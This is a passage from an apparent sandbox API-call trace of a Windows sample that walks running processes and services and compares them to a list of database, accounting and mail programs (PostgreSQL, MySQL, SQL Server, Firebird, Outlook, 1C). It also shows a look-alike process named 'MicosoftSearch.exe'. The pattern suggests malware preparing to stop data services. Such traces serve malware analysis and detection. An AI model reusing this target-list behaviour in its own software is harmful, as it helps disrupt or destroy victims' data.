(lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0259.132] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0259.132] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.133] lstrlenW (lpString="lsm.exe") returned 7 [0259.133] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0259.133] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0259.133] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0259.133] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0259.133] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0259.133] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0259.133] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0259.133] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.133] lstrlenW (lpString="svchost.exe") returned 11 [0259.133] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.133] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.133] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.134] lstrlenW (lpString="svchost.exe") returned 11 [0259.134] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.134] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.134] lstrlenW (lpString="svchost.exe") returned 11 [0259.134] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0259.134] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0259.134] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.135] lstrlenW (lpString="svchost.exe") returned 11 [0259.135] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.135] lstrlenW (lpString="svchost.exe") returned 11 [0259.135] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.135] lstrlenW (lpString="audiodg.exe") returned 11 [0259.135] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.135] lstrlenW (lpString="svchost.exe") returned 11 [0259.136] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.136] lstrlenW (lpString="svchost.exe") returned 11 [0259.136] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0259.136] lstrlenW (lpString="userinit.exe") returned 12 [0259.136] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.136] lstrlenW (lpString="dwm.exe") returned 7 [0259.136] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.137] lstrlenW (lpString="explorer.exe") returned 12 [0259.137] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.137] lstrlenW (lpString="spoolsv.exe") returned 11 [0259.137] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.137] lstrlenW (lpString="taskhost.exe") returned 12 [0259.137] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.137] lstrlenW (lpString="svchost.exe") returned 11 [0259.137] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0259.138] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0259.138] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0259.138] lstrlenW (lpString="reader_sl.exe") returned 13 [0259.138] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0259.138] CloseHandle (hObject=0x3c8) returned 1 [0259.138] Sleep (dwMilliseconds=0x1f4) [0259.910] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea4c0 [0259.928] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0259.928] GetLastError () returned 0xea [0259.928] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0259.928] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0259.929] CloseServiceHandle (hSCObject=0x47ea4c0) returned 1 [0259.929] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0259.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0259.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0259.929] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0259.929] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0259.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0259.929] lstrlenW (lpString="AudioSrv") returned 8 [0259.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0259.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0259.929] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0259.929] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0259.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0259.929] lstrlenW (lpString="BFE") returned 3 [0259.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0259.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0259.929] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0259.929] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0259.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0259.929] lstrlenW (lpString="CryptSvc") returned 8 [0259.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0259.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0259.930] lstrlenW (lpString="CscService") returned 10 [0259.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0259.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0259.930] lstrlenW (lpString="DcomLaunch") returned 10 [0259.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0259.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0259.930] lstrlenW (lpString="Dhcp") returned 4 [0259.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0259.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0259.930] lstrlenW (lpString="Dnscache") returned 8 [0259.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0259.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0259.930] lstrlenW (lpString="DPS") returned 3 [0259.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0259.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0259.930] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0259.930] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0259.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0259.930] lstrlenW (lpString="eventlog") returned 8 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0259.931] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0259.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0259.931] lstrlenW (lpString="EventSystem") returned 11 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0259.931] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0259.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0259.931] lstrlenW (lpString="gpsvc") returned 5 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0259.931] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0259.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0259.931] lstrlenW (lpString="LanmanWorkstation") returned 17 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0259.931] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0259.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0259.931] lstrlenW (lpString="lmhosts") returned 7 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0259.931] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0259.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0259.931] lstrlenW (lpString="MMCSS") returned 5 [0259.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0259.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0259.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0259.932] lstrlenW (lpString="MpsSvc") returned 6 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0259.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0259.932] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0259.932] lstrlenW (lpString="NlaSvc") returned 6 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0259.932] lstrlenW (lpString="nsi") returned 3 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0259.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0259.932] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0259.932] lstrlenW (lpString="PcaSvc") returned 6 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0259.932] lstrlenW (lpString="PlugPlay") returned 8 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0259.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0259.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0259.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0259.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0259.932] lstrlenW (lpString="Power") returned 5 [0259.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0259.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0259.933] lstrlenW (lpString="ProfSvc") returned 7 [0259.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0259.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0259.933] lstrlenW (lpString="RpcEptMapper") returned 12 [0259.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0259.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0259.933] lstrlenW (lpString="RpcSs") returned 5 [0259.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0259.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0259.933] lstrlenW (lpString="SamSs") returned 5 [0259.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0259.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0259.933] lstrlenW (lpString="Schedule") returned 8 [0259.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0259.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0259.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0259.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0259.934] lstrlenW (lpString="SENS") returned 4 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0259.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0259.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0259.934] lstrlenW (lpString="ShellHWDetection") returned 16 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0259.934] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0259.934] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0259.934] lstrlenW (lpString="Spooler") returned 7 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0259.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0259.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0259.934] lstrlenW (lpString="SysMain") returned 7 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0259.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0259.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0259.934] lstrlenW (lpString="Themes") returned 6 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0259.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0259.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0259.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0259.934] lstrlenW (lpString="TrkWks") returned 6 [0259.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0259.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0259.935] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0259.935] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0259.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0259.935] lstrlenW (lpString="UxSms") returned 5 [0259.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0259.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0259.935] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0259.935] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0259.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0259.935] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0259.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0259.936] Process32FirstW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.936] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 